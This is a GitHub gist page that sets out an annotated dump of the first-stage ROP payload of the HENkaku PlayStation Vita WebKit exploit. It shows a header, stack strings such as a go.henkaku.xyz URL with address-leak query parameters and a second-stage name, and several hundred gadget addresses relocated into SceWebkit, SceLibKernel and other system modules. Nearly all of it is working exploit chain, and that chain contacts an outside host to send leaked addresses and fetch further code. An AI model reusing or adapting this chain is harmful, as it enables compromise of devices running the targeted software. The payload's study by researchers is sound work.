Created
October 19, 2016 18:18
-
-
Save hexkyz/21aad00a60acafc7d9fd54ea93f8ae46 to your computer and use it in GitHub Desktop.
HENkaku - Stage 1 (JS payload)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [HEADER] (0x40 bytes) | |
| 0x524f507e -> ROP~ | |
| 0x01000100 -> Version | |
| 0x00000000 -> NULL | |
| 0x00000000 -> NULL | |
| 0x00000730 -> No reloc | |
| 0x00000000 -> NULL | |
| 0x00000000 -> NULL | |
| 0x00000000 -> NULL | |
| 0x000003F8 -> No reloc | |
| 0x00000000 -> NULL | |
| 0x000C048B -> No reloc | |
| 0x00000000 -> NULL | |
| 0x000005E8 -> No reloc | |
| 0x00000000 -> NULL | |
| 0x00000038 -> No reloc | |
| 0x00000000 -> NULL | |
| [STACK] (from 0x40 to 0x770) | |
| At 0x6F8 contains the strings: | |
| "http://go.henkaku.xyz/x" | |
| "st2" | |
| "?a1=%x" | |
| "&a2=%x&a3=%x&a4=%x&" | |
| "&a5=%x&a6=%x&a7=%x&" | |
| "ldr" | |
| [CODE] (from 0x770 to 0xB68) | |
| 0x008e27c5 -> Reloc to SceWebkit | |
| 0x00000040 -> No reloc | |
| 0x00000028 -> Reloc to stack | |
| 0x00106fc5 -> Reloc to SceWebkit | |
| 0x00014a79 -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x008dd9b5 -> Reloc to SceWebkit | |
| 0x000000ff -> No reloc | |
| 0x000003f0 -> Reloc to stack | |
| 0x00000028 -> Reloc to stack | |
| 0x00000000 -> No reloc | |
| 0x0000675c -> Reloc to SceLibKernel | |
| 0x00000000 -> No reloc | |
| 0x000fcdbb -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x008e27c5 -> Reloc to SceWebkit | |
| 0x000001b8 -> No reloc | |
| 0x000004f8 -> Reloc to stack | |
| 0x00106fc5 -> Reloc to SceWebkit | |
| 0x00014a79 -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x008e7445 -> Reloc to SceWebkit | |
| 0x00000444 -> Reloc to stack | |
| 0x000004f8 -> Reloc to stack | |
| 0x000695b1 -> Reloc to SceWebkit | |
| 0x0000676c -> Reloc to SceLibKernel | |
| 0x000fcdbb -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x008dd9b5 -> Reloc to SceWebkit | |
| 0x000006d8 -> Reloc to stack | |
| 0x000054c8 -> Reloc to SceWebkit | |
| 0x10000100 -> No reloc | |
| 0x00600000 -> No reloc | |
| 0x0000acc9 -> Reloc to SceLibKernel | |
| 0x00000000 -> No reloc | |
| 0x000bfb91 -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x00000000 -> No reloc | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x00895285 -> Reloc to SceWebkit | |
| 0x00000004 -> Reloc to stack | |
| 0x00106fc5 -> Reloc to SceWebkit | |
| 0x00014a79 -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x008e27c5 -> Reloc to SceWebkit | |
| 0x0000007c -> No reloc | |
| 0x00000034 -> Reloc to stack | |
| 0x00106fc5 -> Reloc to SceWebkit | |
| 0x00014a79 -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x008e7445 -> Reloc to SceWebkit | |
| 0x00000004 -> Reloc to stack | |
| 0x00000034 -> Reloc to stack | |
| 0x000695b1 -> Reloc to SceWebkit | |
| 0x0000a791 -> Reloc to SceLibKernel | |
| 0x000fcdbb -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x008e7445 -> Reloc to SceWebkit | |
| 0x00000068 -> Reloc to stack | |
| 0x00001000 -> No reloc | |
| 0x000695b1 -> Reloc to SceWebkit | |
| 0x00130a15 -> Reloc to SceWebkit | |
| 0x000fcdbb -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x00895285 -> Reloc to SceWebkit | |
| 0x0000001c -> Reloc to stack | |
| 0x00106fc5 -> Reloc to SceWebkit | |
| 0x00014a79 -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x008e27c5 -> Reloc to SceWebkit | |
| 0x000000bc -> Reloc to stack | |
| 0x000006b8 -> Reloc to stack | |
| 0x00006775 -> Reloc to SceLibc | |
| 0x00014a79 -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x008dd9b5 -> Reloc to SceWebkit | |
| 0x0000001c -> Reloc to stack | |
| 0x00000000 -> No reloc | |
| 0x008e27c5 -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x00000000 -> No reloc | |
| 0x000fcdbb -> Reloc to SceWebkit | |
| 0x000695b1 -> Reloc to SceWebkit | |
| 0x000065bd -> Reloc to SceLibc | |
| 0x0021a295 -> Reloc to SceWebkit | |
| 0x000002c4 -> Reloc to stack | |
| 0x00000100 -> No reloc | |
| 0x000006e4 -> Reloc to stack | |
| 0x001c6467 -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x008e27c5 -> Reloc to SceWebkit | |
| 0x000000bc -> Reloc to stack | |
| 0x000002c4 -> Reloc to stack | |
| 0x00006775 -> Reloc to SceLibc | |
| 0x00014a79 -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x008dd9b5 -> Reloc to SceWebkit | |
| 0x000002c4 -> Reloc to stack | |
| 0x00000100 -> No reloc | |
| 0x000006f0 -> Reloc to stack | |
| 0x00000000 -> Reloc to SceWebkit | |
| 0x000065bd -> Reloc to SceLibc | |
| 0x00000000 -> No reloc | |
| 0x000bfb91 -> Reloc to SceWebkit | |
| 0x00000000 -> Reloc to SceLibKernel | |
| 0x00000000 -> Reloc to SceLibc | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x008e27c5 -> Reloc to SceWebkit | |
| 0x000000bc -> Reloc to stack | |
| 0x000002c4 -> Reloc to stack | |
| 0x00006775 -> Reloc to SceLibc | |
| 0x00014a79 -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x008dd9b5 -> Reloc to SceWebkit | |
| 0x000002c4 -> Reloc to stack | |
| 0x00000100 -> No reloc | |
| 0x0000070c -> Reloc to stack | |
| 0x00000000 -> Reloc to Unk5 | |
| 0x000065bd -> Reloc to SceLibc | |
| 0x00000000 -> No reloc | |
| 0x000bfb91 -> Reloc to SceWebkit | |
| 0x00000000 -> Reloc to SceNet | |
| 0x00000000 -> Reloc to Unk7 | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x008e27c5 -> Reloc to SceWebkit | |
| 0x000000bc -> Reloc to stack | |
| 0x000002c4 -> Reloc to stack | |
| 0x00006775 -> Reloc to SceLibc | |
| 0x00014a79 -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x0091b9bd -> Reloc to SceWebkit | |
| 0x00010000 -> No reloc | |
| 0x000092fd -> Reloc to Unk5 | |
| 0x000fcdbb -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x008dd9b5 -> Reloc to SceWebkit | |
| 0x00000728 -> Reloc to stack | |
| 0x00000002 -> No reloc | |
| 0x00000001 -> No reloc | |
| 0x00000000 -> No reloc | |
| 0x0000947b -> Reloc to Unk5 | |
| 0x00000000 -> No reloc | |
| 0x000fcdbb -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x008dbdd5 -> Reloc to SceWebkit | |
| 0x000000bc -> Reloc to stack | |
| 0x00000000 -> No reloc | |
| 0x0000950b -> Reloc to Unk5 | |
| 0x0010665d -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x00860637 -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000000bc -> Reloc to stack | |
| 0x00000000 -> No reloc | |
| 0x000095ff -> Reloc to Unk5 | |
| 0x000bfb91 -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x00000000 -> No reloc | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x00895285 -> Reloc to SceWebkit | |
| 0x00000010 -> Reloc to stack | |
| 0x00106fc5 -> Reloc to SceWebkit | |
| 0x00014a79 -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x008e27c5 -> Reloc to SceWebkit | |
| 0x00000010 -> Reloc to stack | |
| 0x00000000 -> No reloc | |
| 0x00000000 -> No reloc | |
| 0x000695b1 -> Reloc to SceWebkit | |
| 0x00009935 -> Reloc to Unk5 | |
| 0x000fcdbb -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x00884b85 -> Reloc to SceWebkit | |
| 0x00600000 -> No reloc | |
| 0x00927215 -> Reloc to SceWebkit | |
| 0x0000001c -> Reloc to stack | |
| 0x000698fb -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x00927215 -> Reloc to SceWebkit | |
| 0x00000010 -> Reloc to stack | |
| 0x000695b1 -> Reloc to SceWebkit | |
| 0x00009983 -> Reloc to Unk5 | |
| 0x000fcdbb -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x008e7445 -> Reloc to SceWebkit | |
| 0x0000001c -> Reloc to stack | |
| 0x000003e0 -> Reloc to stack | |
| 0x000695b1 -> Reloc to SceWebkit | |
| 0x00106fc5 -> Reloc to SceWebkit | |
| 0x000fcdbb -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x008e27c5 -> Reloc to SceWebkit | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x000003e4 -> Reloc to stack | |
| 0x00106fc5 -> Reloc to SceWebkit | |
| 0x00014a79 -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x008e27c5 -> Reloc to SceWebkit | |
| 0x00000004 -> Reloc to stack | |
| 0x0000001c -> No reloc | |
| 0x000003cc -> Reloc to stack | |
| 0x000695b1 -> Reloc to SceWebkit | |
| 0x0000a789 -> Reloc to SceLibKernel | |
| 0x000fcdbb -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x008e27c5 -> Reloc to SceWebkit | |
| 0x00000004 -> Reloc to stack | |
| 0x00000000 -> No reloc | |
| 0x00000000 -> No reloc | |
| 0x000695b1 -> Reloc to SceWebkit | |
| 0x000016fd -> Reloc to SceLibKernel | |
| 0x000fcdbb -> Reloc to SceWebkit | |
| 0x00000000 -> No reloc | |
| 0x000c048b -> Reloc to SceWebkit | |
| 0x000c048b -> Reloc to SceWebkit |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment